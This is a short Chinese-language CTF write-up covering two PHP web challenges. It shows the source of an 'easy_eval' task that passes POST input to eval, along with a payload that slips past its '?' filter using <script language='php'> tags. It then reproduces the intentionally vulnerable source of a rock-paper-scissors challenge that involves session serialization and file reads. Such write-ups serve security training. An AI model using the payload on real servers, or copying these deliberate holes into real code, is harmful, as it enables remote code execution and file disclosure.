easy_eval
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
| <?php
error_reporting(0); highlight_file(__FILE__);
$code = $_POST['code'];
if(isset($code)){
$code = str_replace("?","",$code); eval("?>".$code);
}
|
用原标签打不了了,只能换其他标签
1
| code=<script language="php"> phpinfo();</script>
|
然后代码执行就行
剪刀石头布
要求赢一百局才能拿到flag,show一下source
源码太长了,还有php的配置信息,我筛选一下需要用到的放进来就行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119
| <?php ini_set('session.serialize_handler', 'php'); if(isset($_POST['source'])){ highlight_file(__FILE__); phpinfo(); die(); } error_reporting(0); include "flag.php"; class Game{ public $log,$name,$play;
public function __construct($name){ $this->name = $name; $this->log = '/tmp/'.md5($name).'.log'; }
public function play($user_input,$bot_input){ $output = array('Rock'=>'✌🏻','Paper'=>'✊🏻','Scissors'=>'✋🏻'); $this->play = $user_input.$bot_input; if($this->play == "RockRock" || $this->play == "PaperPaper" || $this->play == "ScissorsScissors"){ file_put_contents($this->log,"<div>".$output[$user_input].' VS '.$output[$bot_input]." Draw</div>\n",FILE_APPEND); return "Draw"; } else if($this->play == "RockPaper" || $this->play == "PaperScissors" || $this->play == "ScissorsRock"){ file_put_contents($this->log,"<div>".$output[$user_input].' VS '.$output[$bot_input]." You Lose</div>\n",FILE_APPEND); return "You Lose"; } else if($this->play == "RockScissors" || $this->play == "PaperRock" || $this->play == "ScissorsPaper"){ file_put_contents($this->log,"<div>".$output[$user_input].' VS '.$output[$bot_input]." You Win</div>\n",FILE_APPEND); return "You Win"; } }
public function __destruct(){ echo "<h5>Game History</h5>\n"; echo "<div class='all_output'>\n"; echo file_get_contents($this->log); echo "</div>"; } }
?>
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="icon" href="icon.png"> <title>Rock Paper Scissors</title> <!-- post 'source' to view something --> <link rel="stylesheet" href="style.css"> </head>
<?php session_start(); if(isset($_POST['name'])){ $_SESSION['name']=$_POST['name']; $_SESSION['win']=0; } if(!isset($_SESSION['name'])){ ?> <body> <h5>Input your name :</h5> <form method="post"> <input type="text" class="result" name="name"></input> <button type="submit">submit</button> </form> </body> </html> <?php exit(); }
?>
<body> <?php echo "<h5>Welecome ".$_SESSION['name'].", now you win ".$_SESSION['win']." rounds.</h5>"; $Game=new Game($_SESSION['name']); ?> <h5>Make your choice :</h5> <form method="post"> <button type="submit" value="Rock" name="choice">✌🏻</button> <button type="submit" value="Paper" name="choice">✊🏻</button> <button type="submit" value="Scissors" name="choice">✋🏻</button> </form>
<?php $choices = array("Rock", "Paper", "Scissors"); $rand_bot = array_rand($choices); $bot_input = $choices[$rand_bot]; if(isset($_POST["choice"]) AND in_array($_POST["choice"],$choices)){ $user_input = $_POST["choice"]; $result=$Game->play($user_input,$bot_input); if ($result=="You Win"){ $_SESSION['win']+=1; } else { $_SESSION['win']=0; } } else { ?> <form method="post"> <button class="flag" value="flag" name="flag">get flag</button> <button class="source" value="source" name="source">show source</button> </form> <?php if(isset($_POST["flag"])){ if($_SESSION['win']<100){ echo "<div>You need to win 100 rounds in a row to get flag.</div>"; } else { echo "Here is your flag:".$flag; }
} } ?> </body> </html>
|